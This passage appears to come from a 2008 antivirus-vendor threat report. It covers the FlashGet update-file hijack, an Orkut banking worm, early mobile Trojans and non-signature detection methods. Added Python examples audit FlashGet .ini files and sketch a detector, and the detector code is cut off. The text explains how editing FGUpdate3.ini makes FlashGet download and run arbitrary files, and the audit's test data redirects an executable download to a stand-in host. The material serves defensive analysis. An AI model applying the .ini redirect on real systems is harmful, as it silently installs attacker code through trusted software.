original condition. 
However, in less than two weeks, on 22nd March, Steve Bass, the editor of the popular publication PC World, detected Trojan-Downloader.Win32.Agent.kht in his FlashGet directory. It looked as though history was repeating itself – both the FlashGet site and the program itself were once again spreading malicious code. &lt;br /&gt;&lt;br /&gt;We can see two ways in which FlashGet could be transformed into a Trojan downloader program.&lt;br /&gt;&lt;br /&gt;The first is the most obvious explanation – the site itself was hacked. As a result, a malicious user would be able to replace the standard configuration file with a file that would lead to the Trojan placed on the site. We don't know why the hackers didn't use a different site – it might be that they worked on the principle that hiding in plain view (e.g. a link to the FlashGet file in the configuration file would not raise suspicions) would be the best disguise. &lt;br /&gt;&lt;br /&gt;We decided to check if it would be possible to use this trick to download any other files from any other sites. The answer: yes. All you need to do is add a link to the FGUpdate3.ini file. And that link can lead to anything, which will then be automatically downloaded and launched on your computer each time FlashGet is launched. Even if you don't press "Refresh", FlashGet will independently use the information from the .ini file. &lt;br /&gt;&lt;br /&gt;The 'vulnerability' is present in all versions of FlashGet 1.9.xx. This means that even though the hack of the FlashGet site has been fixed, the vulnerability in the user's system remains. Any Trojan program can modify the local FlashGet .ini file, making it act as a Trojan downloader. And it's this method which is the second of the two mentioned above. 
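The weak point described above is that FlashGet trusts whatever its update .ini says: each name listed under [Add] has a section of the same name whose url is fetched and run. The following is an added example, not code from the report or from FlashGet: an audit script that parses a local FGUpdate3.ini and flags entries that are not in a known-good baseline, that name an executable, or whose url points outside the vendor's download host. The sample text reproduces the file quoted above; the baseline of original entries (fgres1.ini and FlashGet_LOGO.gif) and the trusted host (dl.flashget.com) are assumptions. Note that the inapp4.exe entry is flagged even though its url is on the genuine vendor site, which is exactly the "hiding in plain view" case the report describes.

```python
# Added example: audit of a FlashGet-style FGUpdate3.ini. Not code from the
# report or from FlashGet. Baseline entries and trusted host are assumptions.
import configparser
import os
from urllib.parse import urlparse

# Constructed sample reproducing the FGUpdate3.ini quoted in the report.
SAMPLE_INI = """[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031
[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%
[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%
"""

# Same file with the payload url redirected to a non-vendor host (constructed).
TAMPERED_INI = SAMPLE_INI.replace("http://dl.flashget.com/flashget/appA.cab",
                                  "http://cdn.example.net/appA.cab")

# Assumed baseline: entries present in an unmodified FGUpdate3.ini.
KNOWN_GOOD_ADDS = {"fgres1.ini", "FlashGet_LOGO.gif"}
# Assumed: the only host the updater should ever be allowed to fetch from.
TRUSTED_HOSTS = {"dl.flashget.com"}
# File types the client would execute rather than merely store.
EXECUTABLE_EXTS = {".exe", ".dll", ".com", ".scr", ".bat", ".cmd", ".pif", ".vbs", ".js"}


def parse_update_ini(text):
    """Parse the .ini preserving key case; '%product%' must not interpolate."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def audit_update_ini(text, known_good=KNOWN_GOOD_ADDS, trusted_hosts=TRUSTED_HOSTS):
    """Return one finding per suspicious [Add] entry, with the reasons."""
    cp = parse_update_ini(text)
    findings = []
    if not cp.has_section("Add"):
        return findings
    for name, version in cp.items("Add"):
        reasons = []
        if name not in known_good:
            reasons.append("not in baseline")
        if os.path.splitext(name)[1].lower() in EXECUTABLE_EXTS:
            reasons.append("executable payload")
        url = cp.get(name, "url", fallback=None) if cp.has_section(name) else None
        if url is None:
            reasons.append("no download section")
        else:
            host = urlparse(url).hostname or ""
            if host not in trusted_hosts:
                reasons.append("untrusted host " + host)
        if reasons:
            findings.append({"file": name, "version": version,
                             "url": url, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_update_ini(SAMPLE_INI):
        print(f["file"], f["url"], ", ".join(f["reasons"]))
```

The baseline comparison is what catches the real incident: a vendor-hosted .cab on the vendor's own domain passes the host check, so only knowledge of what the file is supposed to contain separates a legitimate update from an injected one. The same approach applies to any auto-updater that reads its manifest from an unsigned, user-writable file.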
&lt;br /&gt;&lt;br /&gt;Is there any need to stress the fact that FlashGet is usually treated as a trusted application, and that any network activity generated by the program, including connections to any site, is seen as legitimate?&lt;br /&gt;&lt;br /&gt;There has, to date, been no official reaction from the Chinese company which develops FlashGet. The true cause of the incident remains unknown, and there is no guarantee that it will not happen again. You can draw your own conclusions…&lt;br /&gt;&lt;br /&gt;Antivirus companies retain the right to decide whether or not FlashGet is potentially malicious, and have started to classify it as Riskware. There are more than enough grounds for doing so. &lt;br /&gt;&lt;br /&gt;Some sociable worms&lt;br /&gt;We wrote about the danger posed by social networking sites in our annual report. We forecast that in 2008 users of social networking sites would become the main targets for phishing attacks, and that demand would grow among malicious users for account data for services such as Facebook, MySpace, LiveJournal, Blogger and others. This would become a dangerous alternative to placing malicious programs on hacked sites. In 2008, many Trojan programs would spread via user accounts on social networking sites, via their blogs and via their profiles. &lt;br /&gt;&lt;br /&gt;February 2008 met these expectations in full. Once again Orkut, the popular social networking site owned by Google, came under attack. &lt;br /&gt;&lt;br /&gt;Orkut is extremely popular in a number of countries throughout the world, and particularly in Brazil and India. According to data provided by Alexa.com, a web information company, 67% of the requests made to Orkut come from Brazil, and more than 15% from India. &lt;br /&gt;&lt;br /&gt;For the last few years, Brazil has been seen as one of the most virus-ridden countries in the world. 
Brazilian virus writers are notorious for the thousands of different Trojans they've created to steal users' bank account data. Families such as Bancon, Banpaes and Banload are made up almost 100% of Trojans created in South America.&lt;br /&gt;&lt;br /&gt;Online banking is very popular in Brazil. Orkut is very popular in Brazil. There are lots of virus writers in Brazil. These three factors combine to result in one thing: the appearance of a worm which spreads via Orkut and steals account data for online banking systems. &lt;br /&gt;&lt;br /&gt;Out of all the social networking sites, Orkut has the longest list of malicious programs which target it. In 2006 and 2007 the site suffered from virus epidemics, and between 2005 and 2007, Orkut was the target of hacker attacks, and many vulnerabilities were detected. The most recent publicized incident was the appearance of a script worm in December 2007, when over 700,000 users ended up infected. &lt;br /&gt;&lt;br /&gt;A mere two months later, in February 2008, a new epidemic broke out. This time the hackers hadn't bothered to search for or exploit XSS vulnerabilities on Orkut. The new worm functioned in accordance with relatively simple principles:&lt;br /&gt;&lt;br /&gt;The user gets a message from one of his/her contacts. The message contains a pornographic picture in Flash movie format. &lt;br /&gt;If the user clicks on the image, s/he is redirected to a malicious site. &lt;br /&gt;The user is asked if s/he wants to install a Flash player application, which is in fact a Trojan program. &lt;br /&gt;Once the Trojan has been downloaded and launched, it downloads other Trojan components to the victim machine via the Internet. &lt;br /&gt;The user's account is then used to create new messages as described in point 1. &lt;br /&gt;The malicious module tracks the user's use of Orkut. &lt;br /&gt;Other modules harvest data entered via the keyboard when the user contacts Brazilian online banking systems. 
&lt;br /&gt;It's impossible to establish the exact number of victims, but our colleagues from Symantec estimate a minimum of 13,000 affected users. &lt;br /&gt;&lt;br /&gt;This incident shows once again how vulnerable users of social networking sites can be. The main factors which make Web 2.0 services popular with users and hackers alike are listed below:&lt;br /&gt;&lt;br /&gt;The migration of user data from the PC to the Internet &lt;br /&gt;The ability to use one account to access a number of different services &lt;br /&gt;Detailed information about the user &lt;br /&gt;Information about the user's contacts and friends &lt;br /&gt;Space to publish whatever you like &lt;br /&gt;Trust between contacts &lt;br /&gt;The problem has already become fairly serious, and stands every chance of becoming a major information security issue. We'll be releasing a paper dedicated to this topic in the near future. &lt;br /&gt;&lt;br /&gt;Mobile News&lt;br /&gt;The world of mobile virology was an eventful place in the first quarter of 2008. It was clear that technologies were continuing to evolve and that more and more participants – both virus writers and antivirus companies – were getting involved. Innovations in malicious code were split more or less evenly between the four targets of Symbian, Windows Mobile, J2ME and the iPhone.&lt;br /&gt;&lt;br /&gt;Symbian&lt;br /&gt;As far as Symbian goes, this operating system came under attack from a worm belonging to a completely new family. Up until this point, we'd seen two types of threat: Cabir, which spreads via Bluetooth, and ComWar, which spreads via MMS. Of course, there were several variants of both these worms. &lt;br /&gt;&lt;br /&gt;At the end of December, a program was added to our antivirus databases which at first glance seemed to simply be a new ComWar clone: ComWar.y. 
However, in January the appearance of this program in the traffic of one of the largest mobile operators forced us to take a more detailed look at the new sample. &lt;br /&gt;&lt;br /&gt;An analysis conducted by one of our partners, the Finnish company F-Secure, showed that in actual fact this malicious program was representative of a completely new family, which had nothing in common with ComWar, created three years ago in Russia. &lt;br /&gt;&lt;br /&gt;The worm, which was classified as Worm.SymbOS.Beselo.a (Beselo.b was detected shortly afterwards) functions in a way very similar to ComWar, and takes an approach typical for worms of this type. It spreads by sending infected SIS files via MMS and Bluetooth. Once the worm is launched on the device under attack, the worm starts to send itself to the contacts on the phone, and also to all accessible Bluetooth devices within range. &lt;br /&gt;&lt;br /&gt;What's the news value in this? It's the fact that there is a new, active family of worms for mobile devices (which implies the existence of active virus writers) and the presence of this worm in the wild. New variants of Beselo could cause serious local epidemics – this after all is what happened in spring last year, when 115,000 smartphone users fell victim to a Spanish modification of the ComWar worm. &lt;br /&gt;&lt;br /&gt;Windows Mobile&lt;br /&gt;The appearance of a new malicious program for Windows Mobile, which hasn't been a focus of attention for virus writers up until now, is certainly noteworthy. However, InfoJack, a Trojan which was detected at the end of February, is particularly interesting for the following reasons:&lt;br /&gt;&lt;br /&gt;InfoJack.a&lt;br /&gt;&lt;br /&gt;attacks Windows Mobile &lt;br /&gt;was detected in the wild &lt;br /&gt;is spreading in China &lt;br /&gt;steals data &lt;br /&gt;This is the first malicious code targeting Windows Mobile which has been found in the wild and which has caused a significant number of infections. 
The code spread from a Chinese site which offered a range of legitimate software. The Trojan was added to mobile product distributions such as Google Maps and game clients. The owner of the site from which the Trojan spread stated that he did not have any illegal intentions, but was collecting information about the users of the site in order to improve the service and to analyze the market for mobile applications. &lt;br /&gt;&lt;br /&gt;Once it is on the system, the Trojan attempts to disable the protection mechanism which prevents the installation of applications that lack a developer's digital signature. When the infected smartphone is connected to the Internet, InfoJack starts to send confidential information from the device to the Trojan's site. This information includes the device serial number and information about the operating system and installed applications. At the same time, the Trojan may download additional files to the phone without the knowledge of the user, and launch these files – it's able to do this because protection against launching unsigned applications has been disabled. &lt;br /&gt;&lt;br /&gt;After a few days the activity of the site was halted, probably in connection with the investigation conducted by the Chinese police. &lt;br /&gt;&lt;br /&gt;This report has already covered what happens when virus writers turn their attention to popular services (e.g. the attacks on Orkut in Brazil). China is undoubtedly the world leader in terms of production of malicious code; at the moment, more than 50% of all new malicious programs in our antivirus databases originate in China. Until now, Chinese hackers have targeted online gamers who use personal computers. However, the case of InfoJack shows that they have the capability to create mobile viruses and organize mass epidemics. &lt;br /&gt;&lt;br /&gt;China has become the first country to suffer from a Windows Mobile Trojan. 
It's possible that the author of InfoJack really didn't have anything illegal in mind. However, now the foundation has been laid, the thousands of Chinese hackers currently creating viruses for personal computers may choose to build on it. &lt;br /&gt;&lt;br /&gt;J2ME&lt;br /&gt;During the first quarter of 2008, Trojans for J2ME (which will run on almost any modern mobile, and not just on smartphones) started appearing with frightening regularity. In January we detected Smarm.b, followed by Smarm.c and Swapi.a, and March brought SMSFree.d.&lt;br /&gt;&lt;br /&gt;All these Trojans were detected in Russia, and they all use the same method for making money out of users: sending SMS messages to premium numbers. (An investigation into a similar SMS-sending Trojan, Viver, which we conducted last year, showed that in three days the author of the Trojan could earn approximately $500.) In spite of all these incidents, Russian mobile content providers continue to maintain the anonymity of those who register premium numbers. This effectively makes virus writers immune to prosecution: the appearance of new variants of malicious programs and the lack of information about any arrests clearly demonstrate this. &lt;br /&gt;&lt;br /&gt;Apart from the J2ME Trojans mentioned above, there are another two malicious programs which send SMS messages for which a charge is made. Flocker.d and Flocker.e, both written in Python and designed to attack smartphones, were detected in January 2008.&lt;br /&gt;&lt;br /&gt;These malicious programs use the same propagation method as InfoJack: they spread via popular sites which offer software for mobile phones. The Trojans are either disguised as legitimate utilities, or are integrated into such products. &lt;br /&gt;&lt;br /&gt;iPhone&lt;br /&gt;We'll conclude this section on mobile threats with information about a long awaited event: the release in March of the iPhone SDK. 
&lt;br /&gt;&lt;br /&gt;We had believed that the release of the SDK would lead to the appearance of a multitude of malicious programs for iPhone. However, what the open Apple SDK provides is actually very limited. &lt;br /&gt;&lt;br /&gt;Apple has followed Symbian's lead: the model for creating and distributing programs for the iPhone is based on the idea of 'signed' applications. The main restrictions are laid out in the iPhone SDK agreement: "No interpreted code may be downloaded and used in an application except for code that is interpreted and run by Apple's published APIs and built in interpreter(s). An application may not itself install or launch other executable code by any means, including without limitation through the use of a plug-in architecture, calling other frameworks, other APIs or otherwise."&lt;br /&gt;&lt;br /&gt;These restrictions not only make life more difficult for virus writers, but they also effectively rule out such applications as Firefox, Opera, many games, IM clients and much other useful software: applications which could be extremely popular among iPhone users and which could extend the device's capability. &lt;br /&gt;&lt;br /&gt;In the four days after the SDK was released, it was downloaded more than 100,000 times. It seemed that such a huge number of potential developers should lead to an increase in new applications created using the SDK. However, this is not happening. &lt;br /&gt;&lt;br /&gt;Apple has, in a formal sense, fulfilled its promise by making the SDK available. However, it's not yet clear how this step will influence the development even of legitimate software for the phone. The restrictions are too stringent, and too many functions in the SDK remain closed. &lt;br /&gt;&lt;br /&gt;The second major restriction is that applications which have been created using the SDK can only be distributed via Apple's estore. 
This creates a large number of additional barriers, ranging from the number of 'vendors' (developers) allowed, to geographical restrictions (only those in the USA are allowed to participate). &lt;br /&gt;&lt;br /&gt;It's clear that under these conditions it will be impossible to launch an antivirus product for the iPhone – not for technical reasons, but due to the issues described below. &lt;br /&gt;&lt;br /&gt;The continued hacking of the iPhone acts as the backdrop here. It's estimated that between 45% and 50% of all devices sold have been 'unlocked'. All of these devices are potentially vulnerable to infection by any malicious program for iPhone, as the user will be downloading files from many different unofficial sources to his/her device. This can't be controlled in any way: users of modified phones are not entitled to official technical support, and we'll be unable to provide them with any antivirus protection. &lt;br /&gt;&lt;br /&gt;It's likely that in the foreseeable future the number of people using such devices will equal the number of Symbian smartphone users in 2004 – the year that Cabir appeared. &lt;br /&gt;&lt;br /&gt;Conclusion&lt;br /&gt;The events of the first three months of 2008 show that the period of technical stagnation in the threat landscape is drawing to a close. &lt;br /&gt;&lt;br /&gt;Last year, we described conveyor belt code: a process generating multiple primitive copy-cat programs which do not implement new virus technologies. The phenomenon can be explained: virus writers chose to use tried and tested methods because at the time, even old, well-known approaches were capable of bringing in profits if applied on an industrial scale. &lt;br /&gt;&lt;br /&gt;However, now there is a noticeable change in direction, which is shown above all by the appearance of the first malicious implementation of a bootkit. 
In addition to this, file infection methods are being used more and more frequently, often in conjunction with complex polymorphic techniques. It should also be noted that virus writers are borrowing certain technologies from the antivirus world. For instance, we've already detected malicious programs which, in order to combat antivirus solutions by deleting them or blocking their installation, contain signature detection for the antivirus files. Previously virus writers confined themselves to having their creations search for such files by name. &lt;br /&gt;&lt;br /&gt;Today, old technologies are being re-examined, rethought, and implemented at new levels. The struggle of virus versus antivirus is moving from the software towards the hardware level. &lt;br /&gt;&lt;br /&gt;Although the events of the first quarter of 2008 cannot yet be seen as creating a definite trend, the issues raised may have a strong influence on the entire information security business in the near future. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Virus History&lt;br /&gt;Boot sector and DOS file viruses were the first PC viruses, and by the end of the 1980s, these threats had been joined by a few worms and the first Trojans. Virus writers used a range of stealth techniques to extend the life cycle of malicious code by evading antivirus scanners. Some of these techniques, such as suppressing error messages, and polymorphism (which ensures the virus code is different each time it infects a machine), are still used by virus writers today. &lt;br /&gt;&lt;br /&gt;Antivirus solutions were initially designed as individual utilities to detect and remove specific viruses. However, as the number of viruses increased, antivirus 'toolkits' were released. These included an on-demand scanner which would search for the viruses currently in existence, and in some cases a cleaning utility. 
By the end of 1990, an increase in the number of viruses to nearly 300 caused antivirus vendors to implement real-time protection, and to supplement signature-based analysis with heuristics, behavioural analysis, emulation and other techniques. &lt;br /&gt;&lt;br /&gt;The appearance of the first macro virus in 1995 was a major shift, and these viruses came to dominate the threat landscape in the following four years. Such viruses were the first to deliberately infect data files; they are also neither platform-specific nor OS-specific. This move shifted the focus of the virus writing community from executable code to data. Virus macros were easy to modify, and this opened virus writing to a wider group, causing the number of viruses to increase from around 6,000 in June 1995 to more than 25,000 in December 1998.&lt;br /&gt;&lt;br /&gt;With both the threat landscape and business practices evolving, antivirus solutions also needed to change. It became clear that gateway and mail server solutions would be required in addition to file server and workstation solutions in order to fully secure networks. &lt;br /&gt;&lt;br /&gt;The appearance of the Melissa virus, in March 1999, was another leap forward for malicious code. Melissa's ability to spread independently ushered in the era of email worms, which spread in a variety of ways, and typically use social engineering to trick the user into running the malicious code. Internet worms, which often spread by exploiting vulnerabilities (and often combine this approach with other techniques for maximum effectiveness), made a return in 2001, and remained prevalent in the following years. 
&lt;br /&gt;&lt;br /&gt;In response to these new threats, antivirus vendors started to offer solutions which were broader in scope: adding personal firewall capability, host- and network-based intrusion protection systems, application activity monitoring, and, in some cases, roll-back capability which will undo changes that malicious programs have made to a victim machine. &lt;br /&gt;&lt;br /&gt;The decline in global epidemics since 2003 reflects a shift in the motivation of virus writers: from writing and spreading malicious code simply in order to cause damage to doing this in order to earn money illegally. This has resulted in tailor-made Trojans designed to target a specific system and malicious programs designed to steal user data such as account details and passwords to bank accounts and online games. Trojans can be used to create botnets of infected machines which are then used to send spam which may also contain malicious code. Phishing attacks have also become widespread, with cybercriminals tricking users into entering their bank account details on fake sites. &lt;br /&gt;&lt;br /&gt;Against this background, virus writers have also started targeting the mobile devices which are increasingly used in the business world. Since the first worm for smartphones was detected in 2004, viruses, worms and Trojans for mobile devices have also put in an appearance. In the space of a few years, threats for mobile devices have evolved as much as PC malware did over the course of 20 years. &lt;br /&gt;&lt;br /&gt;The author concludes by emphasising that the threat landscape has changed beyond recognition, making it more important than ever for users to have effective protection. Security solutions must deliver timely protection against the approximately 200 new threats which appear daily, while also implementing technologies which can block unknown threats as they appear. 
&lt;br /&gt;&lt;br /&gt;Non-profit malware organizations&lt;br /&gt;&lt;br /&gt;2007 will be remembered as the year of the demise of “non-profit” malicious programs. For the first time, the year saw no large epidemics or major malicious programs that didn’t have a “financial” background. Almost all the outbreaks in 2007 were short-lived and affected individual regions and countries rather than the entire global Internet. This approach to organizing epidemics has already become a de facto standard in the malware world. &lt;br /&gt;&lt;br /&gt;Among the year’s new malicious programs, a special place is occupied by the Storm Worm (Zhelatin in the Kaspersky Lab classification), which first appeared in January 2007. It demonstrated such a variety of behavior types and spreading methods during the year that each new creation from the unknown virus writers gave antivirus experts yet another headache. &lt;br /&gt;&lt;br /&gt;Worms in the Zhelatin family incorporate implementations of nearly all the virus writing achievements of the past several years, including rootkit technologies, code obfuscation, botnets that protect themselves against analysis, and communication between infected computers via P2P networks, without a control center. Zhelatin worms make use of all the existing spreading methods, both traditional (email and instant messaging systems) and new, such as Web 2.0 services (spreading via social networks, including blogs, forums and RSS feeds). &lt;br /&gt;&lt;br /&gt;DoS attacks were among the key information security threats throughout 2007. Following their extensive use in 2002-2003, DoS attacks lost popularity among cybercriminals. In 2007, they made a comeback, this time as a political and competitive tool rather than a method of extorting money from victims. An attack on Estonia which took place in May 2007 was extensively covered by mass media and is regarded by many experts as the first instance of cyber-warfare. 
Many DoS attacks of 2007 were instigated by the victims’ business competitors. Whereas four years ago, DoS attacks were used by hackers to extort money or by cybervandals to wreak havoc, such attacks are now a commodity to the same extent as spam mailings and custom-developed malicious programs. &lt;br /&gt;&lt;br /&gt;In 2007, the cybercriminal business came up with several new types of criminal activity. One area that progressed rapidly was the development of malicious programs to order with technical support provided to customers. A good example of business organized along these lines is Pinch, a Trojan program. Its authors developed more than 4,000 custom variants in several years. The Pinch story apparently ended in December 2007, when Nikolay Patrushev, head of Russia’s Federal Security Services, announced that the Trojan’s authors had been arrested. &lt;br /&gt;&lt;br /&gt;Looking at the year’s results from the quantitative point of view, a hands-down victory was won by game Trojans, which are designed to steal data from online game users. These malicious programs significantly outnumber banking Trojans, i.e., programs that steal users’ bank account data. &lt;br /&gt;&lt;br /&gt;Notable events of 2007 include mass site hacking attacks, after which malicious programs or links to infected sites were placed on the hacked websites. In one such event, about 10,000 Italian sites were hacked and the Mpack exploit pack was put onto the hacked sites. The Italian incident and Mpack drew attention to one more area of cybercriminal activity: the malicious programs were traced to Russian Business Network (RBN) websites. In fact, this is an example of so-called bulletproof hosting. The service guarantees customers anonymity, protection from legal action and the absence of log files. There was a boom of mass media coverage of RBN, which ended when RBN broke up into several hosting services in different countries, making the scale of their activities less obvious. 
&lt;br /&gt;&lt;br /&gt;These were the principal events of 2007, a year that turned out to be the most “viral” year in history. The total number of IT threats more than doubled during the year. In 2007, Kaspersky Lab added almost as many signatures to its databases as it had during the preceding 15 years. Internet users had never been exposed to such a deluge of threats before, and we had to make every conceivable (and, sometimes, inconceivable) effort to get the better of these threats. This raises serious concerns, because, unless the situation radically changes in 2008 (which is highly unlikely), the number of threats will double again by the end of the year.&lt;br /&gt;&lt;br /&gt;Forecasts&lt;br /&gt;1. Malware 2.0&lt;br /&gt;The evolution of malware from individual malicious programs towards sophisticated integrated projects began four years ago with a modular component system used in the Bagle worm. The new malicious program operating model, the effectiveness of which was demonstrated in 2007 by the Storm Worm, will not only become a standard on which a host of new malicious projects will be based, but will also be further developed and perfected. &lt;br /&gt;&lt;br /&gt;The model has the following main features: &lt;br /&gt;&lt;br /&gt;A network of infected computers is not centrally controlled. &lt;br /&gt;The malware actively resists third-party attempts to analyze its malicious activity and take control of it. &lt;br /&gt;Malicious code is distributed to a large number of computers, but this distribution is performed over a limited period of time. &lt;br /&gt;Social engineering methods are skillfully used. &lt;br /&gt;Different methods are used for malware distribution, with the most obvious methods (such as email) gradually losing popularity. &lt;br /&gt;Different functions are performed by different modules (instead of the all-in-one design).&lt;br /&gt;The new generation of malicious programs can be regarded as Malware 2.0. 
These techniques are used by such malicious programs as Bagle, Zhelatin and Warezov, which are mostly spam-oriented. At the same time, several banking and game Trojan families are also showing signs of evolving towards the Malware 2.0 paradigm.&lt;br /&gt;&lt;br /&gt;2. Rootkits and “bootkits”&lt;br /&gt;Technologies that mask the presence of malicious programs in the system (rootkits) will be used not only by Trojans, but by file viruses as well. One dangerous method of masking the presence of malware in the system is based on infecting the hard drive’s boot sector (programs that do this are called bootkits). This is a reincarnation of an old technique, which allows a malicious program to take control before the operating system (and antivirus software) fully boots. In 2007, this method was used by Backdoor.Win32.Sinowal. This is a significant threat, which could become one of the most dangerous information security threats of 2008.&lt;br /&gt;&lt;br /&gt;3. File viruses&lt;br /&gt;File viruses will continue their comeback. As before, they will be developed primarily by Chinese cybercriminals and will target users of online games. The authors of Zhelatin or Warezov might well use file infection as well, since this can provide them with one more efficient distribution method. &lt;br /&gt;&lt;br /&gt;In 2008, we can expect a surge in the number of incidents involving infected game and program distribution packages available from popular websites or via P2P networks. Viruses will target those files which users provide to other users, since in many cases this method of spreading is even more effective than sending infected files by email.&lt;br /&gt;&lt;br /&gt;4. Attacks targeting social networks&lt;br /&gt;In 2008, phishing will increasingly target users of social networks. User account data for such services as Facebook, MySpace, LiveJournal, Blogger etc. will be in demand among cybercriminals. 
This will become an important alternative to distribution methods based on putting malicious programs onto hacked websites. In 2008, many Trojans will be distributed through accounts of social network users, via their weblogs and profiles. &lt;br /&gt;&lt;br /&gt;XSS / PHP / SQL attacks will be one more problem associated with social networks. Unlike phishing, which is based on fraud and social engineering methods only, these attacks take advantage of errors and vulnerabilities in Web 2.0 services. Consequently, even the most experienced users can be affected. These attacks, like all the others, will target users’ private data and will be used to create databases and/or lists to conduct further attacks involving “traditional” methods.&lt;br /&gt;&lt;br /&gt;5. Mobile threats&lt;br /&gt;As regards mobile devices and, specifically, mobile phones, threats will include primitive Trojans such as the Skuller family for Symbian and the “first Trojan” for the iPhone, as well as various vulnerabilities in smartphone operating systems and applications. A global epidemic of a mobile worm is still unlikely, though, from a technical point of view, it is possible. In 2007, the consolidation of the mobile operating system market between Symbian and Windows Mobile was disrupted somewhat by the launch of the iPhone and the announcement by Google of Android, its new mobile platform. 
As a result of the iPhone’s popularity and newcomer status, it is likely to attract more attention from cybercriminals than other mobile devices, especially if Apple makes its iPhone software development tools (SDK) available to the public, as it promised in late 2007.&lt;br /&gt;&lt;br /&gt;MalCode Evolution&lt;br /&gt;&lt;br /&gt;Although the title seems to reference the full spectrum of technologies used to detect malicious code, the article focuses on non-signature technologies.&lt;br /&gt;&lt;br /&gt;At the beginning of the article the author points out that any technology used to detect malicious code has two components – a technical component and an analytical component. The technical component is the sum of all functions and algorithms which provide the analytical component with data for analysis. The analytical component is a decision-making system which delivers a verdict on the data analysed.&lt;br /&gt;&lt;br /&gt;The technical component. The technical component of a malware detection system collects the data that will be used to analyze the situation.&lt;br /&gt;&lt;br /&gt;As any malicious program is both a file with specific content and the sum of the effects the malicious program has on the operating system, there is a range of methods used to collect data in order to identify malicious code. These methods are listed in order of abstraction. The term abstraction is used to denote the point of view from which the program being run is viewed: as an original digital object (a collection of bytes), as a behaviour (more abstract than the collection of bytes) or as the sum of effects on the operating system (more abstract than the behaviour). Antivirus technology has, more or less, evolved along these lines: working with files, working with events via a file, working with a file via events, and working with the environment itself. 
Consequently, the list given in the article illustrates a natural chronology.&lt;br /&gt;&lt;br /&gt;The very first antivirus programs analyzed file code which was treated as byte sequences. &lt;br /&gt;Using this method means that only the source byte code of a program is analyzed; program behaviour is not taken into account. Today, this method continues to be used in antivirus software - not as the sole detection method, but as a complement to other technologies.&lt;br /&gt;&lt;br /&gt;Emulating program code. &lt;br /&gt;Emulation involves imitating the work of one system using another system without losing functionality and without distorting results. In relation to antivirus software, the emulator breaks down a program's byte code into commands, and then launches each command in a virtual copy of the computer environment. In other words, although an emulator works with a file, it does analyze events. Emulation makes it possible to observe a program’s behaviour without putting the operating system and user data at risk.&lt;br /&gt;&lt;br /&gt;Virtualization: launching a program in a sandbox. &lt;br /&gt;A sandbox is an environment which uses partial or total restriction or emulation of the resources of the operating system to ensure that a program can be safely launched in that space. In this case, virtualization makes it possible to work with a program that is running in a real environment, but the environment is strictly controlled. Using the metaphor of a child in the playground, the operating system represents the world, the malicious program is the child, and the constraints within which the child plays are the confines of the sandbox: a set of rules for interaction between the program and the operating system. Any point of contact between the program and its environment (such as the file system and system registry) can be virtualized. 
Whereas emulation provides an environment in which programs can be run, virtualization uses the operating system itself as the environment, with the sandbox controlling the interaction between the environment and the program.&lt;br /&gt;&lt;br /&gt;Monitoring system events. &lt;br /&gt;Whereas an emulator or sandbox observes each program separately, monitoring technology observes all programs simultaneously by registering all operating system events created by running programs. This technology is currently the most rapidly evolving. However, it is not the most fail-safe technology, as the risk created when launching a program in a real environment significantly lowers the level of protection. Additionally, the monitoring technology can be deceived by the malicious program.&lt;br /&gt;&lt;br /&gt;Searching for system anomalies. &lt;br /&gt;This method makes use of the following features:&lt;br /&gt;&lt;br /&gt;an operating system, together with the programs running within that system, is an integrated system; &lt;br /&gt;the operating system has an intrinsic “system status”; &lt;br /&gt;if malicious code is run in the environment, then the system will have an “unhealthy” status; this differs from a system with a “healthy” status, in which there is no malicious code.&lt;br /&gt;In order to detect malicious code effectively using this method, a relatively complex analytical system (such as an expert system or neural network) is required. Due to this complexity, the technology is still currently underdeveloped. At the moment, implementations in this area generally compare the condition of the system with a known standard, but this is not effective.&lt;br /&gt;&lt;br /&gt;The analytical component. As for the analytical component, the sophistication of decision-making algorithms varies. Roughly speaking, they can be divided into three categories:&lt;br /&gt;&lt;br /&gt;Simple comparison. 
&lt;br /&gt;In this category, a verdict is issued based on the comparison of a single object with an available sample.&lt;br /&gt;&lt;br /&gt;Complex comparison. &lt;br /&gt;In this case a verdict is issued based on the comparison of one or several objects with corresponding samples. The templates used for comparison may be flexible, and the comparison gives a probability-based result.&lt;br /&gt;&lt;br /&gt;Expert systems. &lt;br /&gt;In this category, a verdict is issued after a sophisticated analysis of data. An expert system may include elements of artificial intelligence.&lt;br /&gt;&lt;br /&gt;The article then goes on to examine exactly which algorithms are used in which malware detection technologies. The technical component of a technology is responsible for features such as how resource-hungry a program is (and as a result, how quickly it works), security and protection. In general, the less abstract the form of protection, the more secure it will be, but the easier it will be to circumvent.&lt;br /&gt;&lt;br /&gt;The analytical aspect of a technology is responsible for features such as proactivity (and the consequent impact on the necessity for frequent antivirus database updates), the false positive rate and the level of user involvement. This last denotes the extent to which a user needs to participate in defining protection policies: creating rules, exceptions and black and white lists. It also reflects the extent to which the user participates in the process of issuing verdicts by confirming or rejecting the suspicions of the analytical system. The more complex the analytical system, the more powerful the protection is. However, increased complexity means an increased number of false positives, which can be compensated for by greater user input.&lt;br /&gt;&lt;br /&gt;The author concludes by offering recommendations on how to choose non-signature protection. 
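&lt;br /&gt;&lt;br /&gt;The three analytical categories summarised above (simple comparison, complex comparison and an expert system) can be shown side by side on the same input. The following is an added example and is not code from the article, from Kaspersky Lab, or from any real product: the sample "files", the exact signature, the fragment template and the event names fed in from a hypothetical monitoring component are all constructed for illustration.&lt;br /&gt;

```python
"""Toy illustration of the three analytical categories: simple comparison
(exact byte signature), complex comparison (flexible template scored as a
probability) and a small rule-based expert verdict that also takes
behavioural events from a hypothetical monitoring component.
All samples, signatures and event names are constructed for this example."""
from dataclasses import dataclass

# Constructed sample "files" (byte strings); none of this is real malware.
SAMPLES = {
    "clean.bin":   b"MZ\x90\x00hello world program\x00\x00",
    "exact.bin":   b"MZ\x90\x00STEALPW:send keys to mail\x00",
    "variant.bin": b"MZ\x90\x00STEALpw:SEND keys TO MAIL\x00",  # mutated copy
}

# Simple comparison: one exact byte signature (constructed).
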